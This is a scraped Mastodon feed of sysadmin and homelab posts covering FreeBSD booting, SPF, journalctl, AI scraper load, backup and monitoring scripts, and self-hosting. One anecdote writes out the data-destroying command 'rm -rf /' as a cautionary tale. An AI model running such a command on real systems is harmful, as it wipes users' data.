                                                                                                                                                                                                                                                    Alexandre :freebsd: boosted

                                                                                                                                                                                                                                                    [?]Larvitz :fedora: » 🌐
                                                                                                                                                                                                                                                    @Larvitz@burningboard.net

                                                                                                                                                                                                                                                    New on the blog: FreeBSD Foundationals #3: The Boot Process

                                                                                                                                                                                                                                                    From power-on to login: BIOS vs UEFI, the loader & loader.conf, why a tunable is NOT a sysctl, loading modules the modern way with kld_list, wrangling it all with sysrc, plus a security-hardening baseline.

                                                                                                                                                                                                                                                    And the headline act: boot environments. `bectl create` before every upgrade. When freebsd-update or pkg eats your box, you reboot, pick the old BE in the loader menu, and you're back in 30 seconds.

                                                                                                                                                                                                                                                    blog.hofstede.it/freebsd-found

                                                                                                                                                                                                                                                      [?]Sheldon [he/him] » 🌐
                                                                                                                                                                                                                                                      @sysop408@sfba.social

                                                                                                                                                                                                                                                      @chessert lol, the scariest lesson I’ve ever learned secondhand was if you’re ever gonna do “rm -rf /” on a Linux server triple check the directory you’re doing that to.

                                                                                                                                                                                                                                                      Some new tech at a hosting company I used in the late 90’s deleted the whole server that way. My site was part of the damage.

                                                                                                                                                                                                                                                        [?]Sheldon [he/him] » 🌐
                                                                                                                                                                                                                                                        @sysop408@sfba.social

                                                                                                                                                                                                                                                        Underrated reason to have proper SPF setup for all of your hosted domain names to hard fail improper sending routes... when you forget to turn off the mail sender on your dev server and you run a batch action that sends out tens of thousands of emails to users.

                                                                                                                                                                                                                                                        I saw my inbox fill up with thousands of email notifications since a lot of the notifications were sent to me. The only reason I'm not panicking is because I looked at the mail headers and saw that because the emails were sent from my computer instead of my server, they failed both SPF and DKIM verification checks so any damage should be limited.

                                                                                                                                                                                                                                                        Ugh. 😓

                                                                                                                                                                                                                                                          64 ★ 100 ↺

                                                                                                                                                                                                                                                          [?]oldsysops » 🌐
                                                                                                                                                                                                                                                          @oldsysops@social.dk-libre.fr

                                                                                                                                                                                                                                                          négativité, IA, coup de gueule [SENSITIVE CONTENT]Les 3 externalités négatives de l'IA de la semaine dernière :

                                                                                                                                                                                                                                                          • Coup de téléphone de notre fournisseur de serveur : les specs demandés ne sont plus possibles, rupture des composants (ssd/ram) tout est pour l'IA.
                                                                                                                                                                                                                                                          • Alerte sur notre serveur de ticketing (ouvert), des robots passant par des IP de particulier viennent récupérer toutes nos données (pour la Xeme fois...) en consommant du CPU et saturant le serveur. Obligé de bidouiller à 23:30. Au moins ils sont sympa, ils attendent 23:00 avant de lancer leurs requêtes... Pareil sur le git, ils scannent toutes les URL, y compris et surtout celles qui génèrent de packages et hop un système de fichier qui se remplit... pour rien.
                                                                                                                                                                                                                                                          • Il fait chaud, On ne pourrait pas éteindre un ou deux datacenter pour assistant virtuel ? Où arrêter de scroller 30 fois tout internet en consommant des ressources inutilement. Mon côté pessimiste me fait imaginer des pénuries de nourriture dangereuses Mon côté optimiste pense que ça va être vite réglé par une température fatale qui va rayer la plupart des êtres vivants de la planète sous 3 ans...
                                                                                                                                                                                                                                                          Bref, si vous trouvez que l'IA c'est génial, posez-vous la question :
                                                                                                                                                                                                                                                          "est-ce que je suis d'accord avec un monde où il fait chaud, où plus personne ne peut avoir de ressources informatiques et où le peu de ressources ouvertes sont pillées 36 fois pour rien juste parce que..."

                                                                                                                                                                                                                                                          Si la réponse est oui, je pense que vous faites partie du problème, merci de ne plus me suivre.


                                                                                                                                                                                                                                                            🗳
                                                                                                                                                                                                                                                            AodeRelay boosted

                                                                                                                                                                                                                                                            [?]weed stallman » 🌐
                                                                                                                                                                                                                                                            @incentive@mastodon.circlewithadot.net

                                                                                                                                                                                                                                                            [?]FLOX Advocate » 🌐
                                                                                                                                                                                                                                                            @FLOX_advocate@floss.social

                                                                                                                                                                                                                                                            it turns out that if you auto depend on apt-cacher for the new apt-cacher box on a new network it won't get packages from the apt-cacher you haven't yet installed

                                                                                                                                                                                                                                                            And now I know :)

                                                                                                                                                                                                                                                              AodeRelay boosted

                                                                                                                                                                                                                                                              [?]Haack’s Networking » 🌐
                                                                                                                                                                                                                                                              @oemb1905@gnulinux.social

                                                                                                                                                                                                                                                              :haacknet: Haack's Networking :haacknet:

                                                                                                                                                                                                                                                              👋 We are live folks ... migrating my personal / business infra from my Data Center to my 8900🧳

                                                                                                                                                                                                                                                              🔗 content.haacksnetworking.org/w

                                                                                                                                                                                                                                                              🌅 Come on by and join the fun ... mostly background music on the self-hosted navi while I haack away 😎

                                                                                                                                                                                                                                                              -hosted

                                                                                                                                                                                                                                                              looking out from Kit Carson (the top) to other peaks in CO

                                                                                                                                                                                                                                                              Alt...looking out from Kit Carson (the top) to other peaks in CO

                                                                                                                                                                                                                                                                AodeRelay boosted

                                                                                                                                                                                                                                                                [?]Frank » 🌐
                                                                                                                                                                                                                                                                @rincewind@unseen-university.social

                                                                                                                                                                                                                                                                Neuer Artikel im Blog: Serielle Konsole bei Debian 🐧

                                                                                                                                                                                                                                                                Wer seine VMs virtualisiert hat, kennt das Problem: Man will mal eben draufschauen, aber SSH ist noch nicht bereit oder es lohnt sich nicht extra VNC/SPICE aufzusetzen.

                                                                                                                                                                                                                                                                Mit ein paar Anpassungen an GRUB klappt der Zugriff direkt über virsh console – ganz ohne grafische Oberfläche.

                                                                                                                                                                                                                                                                Das Vorgehen lässt sich übrigens fast 1:1 auf andere Distributionen übertragen, nur das Kommando zum Neuschreiben von GRUB unterscheidet sich.

                                                                                                                                                                                                                                                                👉 just-stuff.blog/serielle-konso

                                                                                                                                                                                                                                                                  Marcos Dione boosted

                                                                                                                                                                                                                                                                  [?]🆘Bill Cole 🇺🇦 [Honestly I don’t care but no one will understand if you use she/her.] » 🌐
                                                                                                                                                                                                                                                                  @grumpybozo@toad.social

                                                                                                                                                                                                                                                                  @eltonfc Sadly, the days are gone when using a non-standard port is perfect evasion of the cred-stuffers. It's still a good idea, but not adequate.

                                                                                                                                                                                                                                                                  As others have said, requiring key-based authentication & keeping sshd updated are also essential. You won’t know that the root password has leaked until you regret it. Many people will say it's overkill to prohibit direct root login but I do that as well to hopefully complicate exploitation of new sshd vulnerabilities.

                                                                                                                                                                                                                                                                    AodeRelay boosted

                                                                                                                                                                                                                                                                    [?]Jan Wildeboer 😷:krulorange: » 🌐
                                                                                                                                                                                                                                                                    @jwildeboer@social.wildeboer.net

                                                                                                                                                                                                                                                                    Thank you, @hughsie for all your work on and fwupdmgr. Thank you, Lenovo, for supporting firmware and UEFI updates through this mechanism. And thank you, Red Hat, for making all of this readily usable. All my Lenovo Tiny PCs in my homelab are now up2date and can continue to SecureBoot for years to come :)

                                                                                                                                                                                                                                                                    @homelab

                                                                                                                                                                                                                                                                    Screenshot of one of my Lenovo Tiny PCs successfully updating the UEFI CA and dbx, making sure that SecureBoot keeps on working after the expiration of one of the Microsoft certificates. All done with the fwupdmgr command, no need to do some weird DOS based stuff with bootable USB sticks.

                                                                                                                                                                                                                                                                    Alt...Screenshot of one of my Lenovo Tiny PCs successfully updating the UEFI CA and dbx, making sure that SecureBoot keeps on working after the expiration of one of the Microsoft certificates. All done with the fwupdmgr command, no need to do some weird DOS based stuff with bootable USB sticks.

                                                                                                                                                                                                                                                                      0 ★ 0 ↺

                                                                                                                                                                                                                                                                      [?]oldsysops » 🌐
                                                                                                                                                                                                                                                                      @oldsysops@social.dk-libre.fr

                                                                                                                                                                                                                                                                      petite action de sysadmin pour faire baisser la charge sur un serveur...
                                                                                                                                                                                                                                                                      c'est marrant que les bots font plus de requêtes le soir et la nuit, au point de déclencher la supervision....
                                                                                                                                                                                                                                                                      bref obliger de casser le fonctionnement du site pour réduire la surface d'exposition.

                                                                                                                                                                                                                                                                        [?]Rocky Linux :rockylinux: » 🌐
                                                                                                                                                                                                                                                                        @rockylinux@fosstodon.org

                                                                                                                                                                                                                                                                        : a few journalctl commands worth keeping handy on Rocky Linux.

                                                                                                                                                                                                                                                                        journalctl -b -- current boot only
                                                                                                                                                                                                                                                                        journalctl -f -- follow in real time
                                                                                                                                                                                                                                                                        journalctl -u sshd -- filter by service
                                                                                                                                                                                                                                                                        journalctl -p err -- errors and above

                                                                                                                                                                                                                                                                          [?]Ollivier Robert 🇺🇦😷🌈♾️ » 🌐
                                                                                                                                                                                                                                                                          @Keltounet@mastodon.social

                                                                                                                                                                                                                                                                          Une certaine notion de l'horreur :

                                                                                                                                                                                                                                                                          — moi : il faut documenter toute l'architecture, etc.
                                                                                                                                                                                                                                                                          — lui : j'ai tous les logs de chatgpt

                                                                                                                                                                                                                                                                          🤬

                                                                                                                                                                                                                                                                            [?]Jeff Moss » 🌐
                                                                                                                                                                                                                                                                            @thedarktangent@defcon.social

                                                                                                                                                                                                                                                                            New is out with security fixes, start your upgrades!
                                                                                                                                                                                                                                                                            nginx.org/en/CHANGES

                                                                                                                                                                                                                                                                              [?]packetcat » 🌐
                                                                                                                                                                                                                                                                              @packetcat@tenforward.social

                                                                                                                                                                                                                                                                              looking at the newly available Fluxer self-hosting docs

                                                                                                                                                                                                                                                                              docs.fluxer.app/operator/get-s

                                                                                                                                                                                                                                                                              > At least 2 vCPU, 4 GB RAM, and 20 GB disk. Use 4 vCPU and 8 GB RAM or more for a small active community.

                                                                                                                                                                                                                                                                              and

                                                                                                                                                                                                                                                                              > The stack idles around a few GB of memory, and startup is the heaviest point because all service images initialize at once.

                                                                                                                                                                                                                                                                              mm, not something that will be cheap to self-host.

                                                                                                                                                                                                                                                                                [?]nixCraft 🐧 » 🌐
                                                                                                                                                                                                                                                                                @nixCraft@mastodon.social

                                                                                                                                                                                                                                                                                Step 1: Open terminal
                                                                                                                                                                                                                                                                                Step 2: Type `alias nano='vim -c "smile"'`
                                                                                                                                                                                                                                                                                Step 3: Enjoy this whenever someone type `nano`!

                                                                                                                                                                                                                                                                                This screenshot shows green ASCII art of the Vim ester eggs on a dark retro terminal screen, with the "Press ENTER or type command to continue" prompt displayed at the bottom when you type nano at the cli via bash alias: alias nano='vim -c "smile"'

                                                                                                                                                                                                                                                                                Alt...This screenshot shows green ASCII art of the Vim ester eggs on a dark retro terminal screen, with the "Press ENTER or type command to continue" prompt displayed at the bottom when you type nano at the cli via bash alias: alias nano='vim -c "smile"'

                                                                                                                                                                                                                                                                                  AodeRelay boosted

                                                                                                                                                                                                                                                                                  [?]r1w1s1 » 🌐
                                                                                                                                                                                                                                                                                  @r1w1s1@snac.bsd.cafe

                                                                                                                                                                                                                                                                                  Are you familiar with dwm's powerful tag feature?
                                                                                                                                                                                                                                                                                  THE TAGGING MODEL
                                                                                                                                                                                                                                                                                  Many desktop environments organize windows using rigid workspaces:
                                                                                                                                                                                                                                                                                      Workspace 1
                                                                                                                                                                                                                                                                                  Workspace 2
                                                                                                                                                                                                                                                                                  Workspace 3
                                                                                                                                                                                                                                                                                  A window belongs to a single workspace.
                                                                                                                                                                                                                                                                                  dwm uses a different model, treating workspaces as bitmask labels (tags).
                                                                                                                                                                                                                                                                                  This allows a single window instance to hold multiple tags simultaneously,
                                                                                                                                                                                                                                                                                  acting as a persistent visual anchor across different contexts:
                                                                                                                                                                                                                                                                                      Firefox            -> Tag 1 (Web Browsing)
                                                                                                                                                                                                                                                                                  st (nvi/dev) -> Tag 2 (Code/Scripts)
                                                                                                                                                                                                                                                                                  st (Monitor/Logs) -> Tag 1 + Tag 2 (Persistent)
                                                                                                                                                                                                                                                                                  When you view Tag 1, you see your browser and the log monitor. When you
                                                                                                                                                                                                                                                                                  switch to Tag 2, the browser disappears, but the exact same log window
                                                                                                                                                                                                                                                                                  remains on screen, now sharing space with your text editor.
                                                                                                                                                                                                                                                                                  The application is never duplicated or restarted in memory.
                                                                                                                                                                                                                                                                                  The UI remains minimal while enabling workflows that are difficult to
                                                                                                                                                                                                                                                                                  express using traditional workspace-oriented desktops.
                                                                                                                                                                                                                                                                                  Two decades later, this tagging model remains one of the most
                                                                                                                                                                                                                                                                                  distinctive features of dwm.


                                                                                                                                                                                                                                                                                    0 ★ 7 ↺
                                                                                                                                                                                                                                                                                    Wallace boosted

                                                                                                                                                                                                                                                                                    [?]oldsysops » 🌐
                                                                                                                                                                                                                                                                                    @oldsysops@social.dk-libre.fr

                                                                                                                                                                                                                                                                                    je suis toujours a la recherche d'un remplaçant pour uptime kuma...
                                                                                                                                                                                                                                                                                    j'ai 2 besoins principaux :
                                                                                                                                                                                                                                                                                    • la communication sur les incidents (avec historique)
                                                                                                                                                                                                                                                                                    • avoir un uptime sur les services (idéalement d'un an... on a les SLA qu'on peu).
                                                                                                                                                                                                                                                                                    j'ai tester (enfin vite fait):
                                                                                                                                                                                                                                                                                    • openstatus (trop compliqué a installé hors docker) j'ai l'impression que ca fait le café mais avec des choix technologiques particulier.
                                                                                                                                                                                                                                                                                    • statusnook (installtion super simple en mode curl|bash que je n'ai pas fait, on regarde toujours avant d'exécuter)
                                                                                                                                                                                                                                                                                    ca avait l'air prometteur mais ca marche pas derrière un reverse proxy (enfin j'y arrive pas) et le projet a l'air mort.
                                                                                                                                                                                                                                                                                    • cachet (installation simple qui n'impose pas docker)
                                                                                                                                                                                                                                                                                    je suis parti sur la v3 et ca à l'air de faire ce que je demande (mais j'ai pas fini, je testerai l'usage demain)

                                                                                                                                                                                                                                                                                    et sinon vous, vous utilisez quoi ?

                                                                                                                                                                                                                                                                                      [?]Haack’s Networking » 🌐
                                                                                                                                                                                                                                                                                      @oemb1905@gnulinux.social

                                                                                                                                                                                                                                                                                      🎬 Haack's Networking 🎥

                                                                                                                                                                                                                                                                                      ✅ We are going live folks‼️

                                                                                                                                                                                                                                                                                      🔗 content.haacksnetworking.org/w

                                                                                                                                                                                                                                                                                      ✍️ Today, I am testing the new OBS setup. Specifically, video on top of the shared desktop and improved layers. Secondly, getting "background music" working that plays nice with my meteor mic. Additionally, I want to test the new PeerTube transcoding rules (for live) that I added as well as see how much RAM/CPU is used during local recording.

                                                                                                                                                                                                                                                                                      pic of yours truly, Jonathan Haack

                                                                                                                                                                                                                                                                                      Alt...pic of yours truly, Jonathan Haack

                                                                                                                                                                                                                                                                                        [?]Stéphane Bortzmeyer » 🌐
                                                                                                                                                                                                                                                                                        @bortzmeyer@mastodon.gougere.fr

                                                                                                                                                                                                                                                                                        "apt-listchanges : pour recevoir des emails détaillés que vous prétendrez lire avant de les archiver automatiquement"

                                                                                                                                                                                                                                                                                        slash-root.fr/debian-configura

                                                                                                                                                                                                                                                                                          [?]Haack’s Networking » 🌐
                                                                                                                                                                                                                                                                                          @oemb1905@gnulinux.social

                                                                                                                                                                                                                                                                                          Come on by just chilling and spinning different tracks! No talking, but chat is open.

                                                                                                                                                                                                                                                                                          Stream: content.haacksnetworking.org/w

                                                                                                                                                                                                                                                                                          livestream obs overlay, a screenshot of it that is

                                                                                                                                                                                                                                                                                          Alt...livestream obs overlay, a screenshot of it that is

                                                                                                                                                                                                                                                                                            [?]Michael W Lucas :flan_on_fire: » 🌐
                                                                                                                                                                                                                                                                                            @mwl@io.mwl.io

                                                                                                                                                                                                                                                                                            While reassembling my desk, what if I was to... bear with me here... make the power distribution slightly sane and stop daisy-chaining extension cords?

                                                                                                                                                                                                                                                                                              [?]Fränçe Licôrne » 🌐
                                                                                                                                                                                                                                                                                              @alter_unicorn@masto.bike

                                                                                                                                                                                                                                                                                              watching 'cat /proc/mdstat'
                                                                                                                                                                                                                                                                                              is the new
                                                                                                                                                                                                                                                                                              watching paint dry

                                                                                                                                                                                                                                                                                                [?]Fränçe Licôrne » 🌐
                                                                                                                                                                                                                                                                                                @alter_unicorn@masto.bike

                                                                                                                                                                                                                                                                                                homelab storage server ready. it just took me 2 years.
                                                                                                                                                                                                                                                                                                - RAID ✅
                                                                                                                                                                                                                                                                                                - mkfs, fstab, etc ✅
                                                                                                                                                                                                                                                                                                - borg ✅
                                                                                                                                                                                                                                                                                                - borg extract ⏳
                                                                                                                                                                                                                                                                                                😴

                                                                                                                                                                                                                                                                                                  [?]Laurent Cheylus » 🌐
                                                                                                                                                                                                                                                                                                  @lcheylus@bsd.network

                                                                                                                                                                                                                                                                                                  Review of IP KVMs, device to remote control a Computer from anywhere on your LAN: PiKVM, Sipeed NanoKVM, JetKVM, LuckFox PicoKVM... - Article by Jeff Geerling @geerlingguy jeffgeerling.com/blog/2026/i-t

                                                                                                                                                                                                                                                                                                    Fred de CLX boosted

                                                                                                                                                                                                                                                                                                    [?]Rocky Linux :rockylinux: » 🌐
                                                                                                                                                                                                                                                                                                    @rockylinux@fosstodon.org

                                                                                                                                                                                                                                                                                                    Everyone who uses Linux today had a moment where something clicked after way too long.
                                                                                                                                                                                                                                                                                                    What's one thing you wish someone had told you when you were starting out?

                                                                                                                                                                                                                                                                                                    Drop it in the comments! Someone reading this probably needs exactly what you're about to share.

                                                                                                                                                                                                                                                                                                      JP Mens boosted

                                                                                                                                                                                                                                                                                                      [?]FreeBSD Foundation » 🌐
                                                                                                                                                                                                                                                                                                      @FreeBSDFoundation@mastodon.social

                                                                                                                                                                                                                                                                                                      Quick fact: if you've ever streamed content on Netflix, used a PlayStation, or sent a packet through a Juniper router, you've touched FreeBSD.

                                                                                                                                                                                                                                                                                                      Learn more about how FreeBSD is used today: freebsdfoundation.org/end-user

                                                                                                                                                                                                                                                                                                        [?]Rocky Linux :rockylinux: » 🌐
                                                                                                                                                                                                                                                                                                        @rockylinux@fosstodon.org

                                                                                                                                                                                                                                                                                                        Here's a question for the community: what's the longest-running Rocky Linux system you have in production?

                                                                                                                                                                                                                                                                                                        Whether it's a homelab server that's been humming along for years or a production box you've never had to think twice about, we want to hear about it. Drop your answer in the comments.

                                                                                                                                                                                                                                                                                                          [?]Haack’s Networking » 🌐
                                                                                                                                                                                                                                                                                                          @oemb1905@gnulinux.social

                                                                                                                                                                                                                                                                                                          Duran Duran - Paper Gods

                                                                                                                                                                                                                                                                                                          I share it again with love:

                                                                                                                                                                                                                                                                                                          gnulinux.studio/app/#/playlist

                                                                                                                                                                                                                                                                                                          User: pubglug
                                                                                                                                                                                                                                                                                                          Pass: musicisawesome

                                                                                                                                                                                                                                                                                                          It's legit solid top to bottom.

                                                                                                                                                                                                                                                                                                          I had vinyl of Rio as a kid ... this album tho, it is so consistent and rhythmic.

                                                                                                                                                                                                                                                                                                          @bobdobberson 👀 lol

                                                                                                                                                                                                                                                                                                          Duran Duran Paper Gods Album Cover

                                                                                                                                                                                                                                                                                                          Alt...Duran Duran Paper Gods Album Cover

                                                                                                                                                                                                                                                                                                            AodeRelay boosted

                                                                                                                                                                                                                                                                                                            [?]BlablaLinux » 🌐
                                                                                                                                                                                                                                                                                                            @blablalinux@mastodon.blablalinux.be

                                                                                                                                                                                                                                                                                                            🔥 Grosse refonte sur le wiki !

                                                                                                                                                                                                                                                                                                            Tes logs Nginx ressemblent à un mur de texte indigeste ? Il est temps de donner des couleurs à ton terminal ! 🎨🐧

                                                                                                                                                                                                                                                                                                            Le guide complet pour coloriser les logs Nginx a reçu une énorme mise à jour. Plus clair, plus efficace, c'est par ici que ça se passe 👇

                                                                                                                                                                                                                                                                                                            🔗 wiki.blablalinux.be/fr/coloris

                                                                                                                                                                                                                                                                                                              [?]Michael W Lucas :flan_on_fire: » 🌐
                                                                                                                                                                                                                                                                                                              @mwl@io.mwl.io

                                                                                                                                                                                                                                                                                                              I packed and moved hurriedly but even so, I'm proud that I held the number of keyboards I brought to a bare minimum.

                                                                                                                                                                                                                                                                                                              
three full-size keyboard boxes, a printer's book-shipping box, and two large plastic tubs, all containing keyboards. Yes, they're all essential. Some are irreplaceable. I SAID THEY'RE ALL ESSENTIAL.

                                                                                                                                                                                                                                                                                                              Alt... three full-size keyboard boxes, a printer's book-shipping box, and two large plastic tubs, all containing keyboards. Yes, they're all essential. Some are irreplaceable. I SAID THEY'RE ALL ESSENTIAL.

                                                                                                                                                                                                                                                                                                                [?]BlablaLinux » 🌐
                                                                                                                                                                                                                                                                                                                @blablalinux@mastodon.blablalinux.be

                                                                                                                                                                                                                                                                                                                Le guide IPv6 ( / / / ) fait peau neuve !

                                                                                                                                                                                                                                                                                                                Vous connaissez déjà cette page de mon wiki, mais elle vient de s'offrir une réécriture complète !

                                                                                                                                                                                                                                                                                                                Pourquoi ? Pour couvrir proprement deux cas de figure bien distincts selon vos besoins. Que vous soyez dans une config ou dans l'autre, tout y est détaillé pas à pas.

                                                                                                                                                                                                                                                                                                                👉 À checker et à mettre dans vos favoris ici : wiki.blablalinux.be/fr/deploie

                                                                                                                                                                                                                                                                                                                Bonne lecture et bon déploiement !

                                                                                                                                                                                                                                                                                                                  [?]Julian Oliver » 🌐
                                                                                                                                                                                                                                                                                                                  @JulianOliver@mastodon.social

                                                                                                                                                                                                                                                                                                                  Yesterday an old friend asked me of the impact AI is having on my work, whether I was using it. I responded that it was not, & that using it would be unproductive as I'd lose so much time auditing deployments by an agent I cannot trust for slop, bloat & flaws.

                                                                                                                                                                                                                                                                                                                  What I didn't have time to add was that I already have v low carbon, 100% sovereign automation I can trust: shell scripts. I know exactly what they do, when & why, because I wrote them. Such value & confidence is irreplaceable.

                                                                                                                                                                                                                                                                                                                    Fred de CLX boosted

                                                                                                                                                                                                                                                                                                                    [?]Le Journal du hacker » 🌐
                                                                                                                                                                                                                                                                                                                    @journalduhacker@framapiaf.org

                                                                                                                                                                                                                                                                                                                    Utiliser le système de secours GRML Live Linux
                                                                                                                                                                                                                                                                                                                    microlinux.fr/blog/grml/

                                                                                                                                                                                                                                                                                                                      [?]2.5 Admins » 🌐
                                                                                                                                                                                                                                                                                                                      @25admins@mastodon.social

                                                                                                                                                                                                                                                                                                                      2.5 Admins 300: IPvWot?

                                                                                                                                                                                                                                                                                                                      Why a proposal for an alternative to IPv6 is unlikely to be viable, Microsoft really doesn't want you to run Exchange Server on-prem, Google will finally stop being a proper search engine, setting up an email server for internal use, and mitigating DDoS attacks without Cloudflare.

                                                                                                                                                                                                                                                                                                                      2.5admins.com/2-5-admins-300/

                                                                                                                                                                                                                                                                                                                      2.5 Admins artwork

                                                                                                                                                                                                                                                                                                                      Alt...2.5 Admins artwork

                                                                                                                                                                                                                                                                                                                        AodeRelay boosted

                                                                                                                                                                                                                                                                                                                        [?]Jordan » 🌐
                                                                                                                                                                                                                                                                                                                        @jordan@mastodon.subj.am

                                                                                                                                                                                                                                                                                                                        I just wrote a little bash script to help automate live VM migrations between hypervisors (using libvirt/kvm/qemu style virtualization).

                                                                                                                                                                                                                                                                                                                        I really miss being able to focus on this kind of progress with my infra. Chasing money gets tiring... I just want to build cool things that people will use.

                                                                                                                                                                                                                                                                                                                          AodeRelay boosted

                                                                                                                                                                                                                                                                                                                          [?]BlablaLinux » 🌐
                                                                                                                                                                                                                                                                                                                          @blablalinux@mastodon.blablalinux.be

                                                                                                                                                                                                                                                                                                                          Marre des logs NPM tout gris ? Je vous ai préparé une nouvelle variante de colorisation pour votre terminal !

                                                                                                                                                                                                                                                                                                                          Un coup de Bash et hop, tout devient plus clair à repérer :
                                                                                                                                                                                                                                                                                                                          🔵 IP client
                                                                                                                                                                                                                                                                                                                          🟢 Pays OK
                                                                                                                                                                                                                                                                                                                          🔴 Pays bloqué
                                                                                                                                                                                                                                                                                                                          🟡 Domaine
                                                                                                                                                                                                                                                                                                                          🟣 Code HTTP

                                                                                                                                                                                                                                                                                                                          Le code est ici 👇
                                                                                                                                                                                                                                                                                                                          👉 privatebin.blablalinux.be/?41a

                                                                                                                                                                                                                                                                                                                            AodeRelay boosted

                                                                                                                                                                                                                                                                                                                            [?]VibeOps » 🌐
                                                                                                                                                                                                                                                                                                                            @vibeops@techhub.social

                                                                                                                                                                                                                                                                                                                            🗄️ Enterprise-Backup für einen 20TB Ubuntu-Fileserver — IBM Spectrum Protect in einer Session! 🚀

                                                                                                                                                                                                                                                                                                                            ~20 Interaktionen, ca. 15 Minuten. Ergebnis:

                                                                                                                                                                                                                                                                                                                            ▫️ TSM BA-Client 8.1.27 installiert (GSKit + API + Client)
                                                                                                                                                                                                                                                                                                                            ▫️ dsm.sys/dsm.opt konfiguriert
                                                                                                                                                                                                                                                                                                                            ▫️ tsm.sh — prüft Installation, Konfiguration, Server-Verbindung, Node-Registrierung, letztes Backup
                                                                                                                                                                                                                                                                                                                            ▫️ In check-all.sh integriert → läuft täglich mit
                                                                                                                                                                                                                                                                                                                            ▫️ Erkennt automatisch: Node nicht registriert? Server erreichbar? Backup gelaufen?

                                                                                                                                                                                                                                                                                                                            Warum wichtig? 20TB Fileserver ohne Backup ist kein Storage — es ist ein Zeitbomben-Experiment. 💣

                                                                                                                                                                                                                                                                                                                            TSM ist der Standard in Unis/Rechenzentren: dedupliziert, verschlüsselt, inkrementell-forever. Der Client checkt jetzt bei jedem Hardware-Check gleich mit ob das Backup lebt.

                                                                                                                                                                                                                                                                                                                            Tech-Stack: Ubuntu 26.04, IBM Spectrum Protect 8.1.27, DEB-Pakete von IBM DHE, Bash-Monitoring, opencode AI

                                                                                                                                                                                                                                                                                                                              [?]Stefano Marinelli » 🌐
                                                                                                                                                                                                                                                                                                                              @stefano@mastodon.bsd.cafe

                                                                                                                                                                                                                                                                                                                              Aggressive caching for a Mastodon reverse proxy: what to cache, what to never cache, and why content negotiation will eventually betray you

                                                                                                                                                                                                                                                                                                                              The same URL serves HTML to browsers, JSON to apps, and ActivityPub to remote instances. Here's how I cache Mastodon with nginx without betraying any of them.

                                                                                                                                                                                                                                                                                                                              it-notes.dragas.net/2026/06/05

                                                                                                                                                                                                                                                                                                                                AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                [?]BlablaLinux » 🌐
                                                                                                                                                                                                                                                                                                                                @blablalinux@mastodon.blablalinux.be

                                                                                                                                                                                                                                                                                                                                📱 Même sur mobile, ça pète ! 🚀

                                                                                                                                                                                                                                                                                                                                Tu as déjà vu passer ma nouvelle coloration de logs sur le wiki ? Voilà ce que ça donne en plein écran sur smartphone avec le script live-ext : un vrai confort visuel avec ses couleurs néon ! 🟣🟢

                                                                                                                                                                                                                                                                                                                                Pour choper le code mis à jour ou revoir le guide complet, c'est par ici :

                                                                                                                                                                                                                                                                                                                                👉 Le script fluo : privatebin.blablalinux.be/?b6f
                                                                                                                                                                                                                                                                                                                                👉 Le tuto du wiki : wiki.blablalinux.be/fr/coloris

                                                                                                                                                                                                                                                                                                                                  Fred de CLX boosted

                                                                                                                                                                                                                                                                                                                                  [?]2.5 Admins » 🌐
                                                                                                                                                                                                                                                                                                                                  @25admins@mastodon.social

                                                                                                                                                                                                                                                                                                                                  2.5 Admins 302: ClawPilot

                                                                                                                                                                                                                                                                                                                                  Microsoft threatens a security researcher for disclosing vulnerabilities publicly, bricks old versions of Office, and announces their version of OpenClaw. Plus keeping up with the latest technology.

                                                                                                                                                                                                                                                                                                                                  2.5admins.com/2-5-admins-302/

                                                                                                                                                                                                                                                                                                                                  2.5 Admins artwork

                                                                                                                                                                                                                                                                                                                                  Alt...2.5 Admins artwork

                                                                                                                                                                                                                                                                                                                                    [?]Stefano Marinelli » 🌐
                                                                                                                                                                                                                                                                                                                                    @stefano@mastodon.bsd.cafe

                                                                                                                                                                                                                                                                                                                                    "Aggressive caching for a Mastodon reverse proxy: what to cache, what to never cache, and why content negotiation will eventually betray you"

                                                                                                                                                                                                                                                                                                                                    A 34 min read

                                                                                                                                                                                                                                                                                                                                    Coming tomorrow, on IT Notes!

                                                                                                                                                                                                                                                                                                                                     

                                                                                                                                                                                                                                                                                                                                      AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                      [?]BlablaLinux » 🌐
                                                                                                                                                                                                                                                                                                                                      @blablalinux@mastodon.blablalinux.be

                                                                                                                                                                                                                                                                                                                                      0 ★ 0 ↺

                                                                                                                                                                                                                                                                                                                                      [?]oldsysops » 🌐
                                                                                                                                                                                                                                                                                                                                      @oldsysops@social.dk-libre.fr

                                                                                                                                                                                                                                                                                                                                      les attaques , ca m'avait pas manqué...
                                                                                                                                                                                                                                                                                                                                      ca a tenu mais y a eu des effets de bord...
                                                                                                                                                                                                                                                                                                                                      ce qui est bien finalement, ca permet de revoir la configuration et voir ou sont les nouveaux SPOFs...
                                                                                                                                                                                                                                                                                                                                      bref ca permet d'avancer !

                                                                                                                                                                                                                                                                                                                                        [?]BlablaLinux » 🌐
                                                                                                                                                                                                                                                                                                                                        @blablalinux@mastodon.blablalinux.be

                                                                                                                                                                                                                                                                                                                                        Mais après quelques sueurs froides, tout est corrigé, stable et 100 % au vert ! 🟢✨ Le plaisir ultime de voir le panneau d'administration tout propre.

                                                                                                                                                                                                                                                                                                                                        Et chez vous, ça se passe comment les updates ? 💻☕

                                                                                                                                                                                                                                                                                                                                          AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                          [?]VibeOps » 🌐
                                                                                                                                                                                                                                                                                                                                          @vibeops@techhub.social

                                                                                                                                                                                                                                                                                                                                          🐧 Hardware-Monitoring für einen Ubuntu-Fileserver — in einer Session gebaut! 🚀

                                                                                                                                                                                                                                                                                                                                          ~50 Interaktionen, ca. 30 Minuten. Ergebnis:

                                                                                                                                                                                                                                                                                                                                          ▫️ sensors.sh — CPU (Package + 6 Cores), NVMe, ACPI Temps
                                                                                                                                                                                                                                                                                                                                          ▫️ disks.sh — SMART für HDD (20TB Exos) + NVMe SSD
                                                                                                                                                                                                                                                                                                                                          ▫️ system.sh — CPU, RAM (DDR5-Slots!), GPU, BIOS, Mainboard via dmidecode
                                                                                                                                                                                                                                                                                                                                          ▫️ mergerfs.sh — Pool-Übersicht: Belegung, Inodes, Berechtigungen
                                                                                                                                                                                                                                                                                                                                          ▫️ updates.sh — apt update/upgrade + Neustart-Check
                                                                                                                                                                                                                                                                                                                                          ▫️ check-all.sh — Master-Script, läuft alles durch
                                                                                                                                                                                                                                                                                                                                          ▫️ mail.sh — Mail-Versand via SMTP
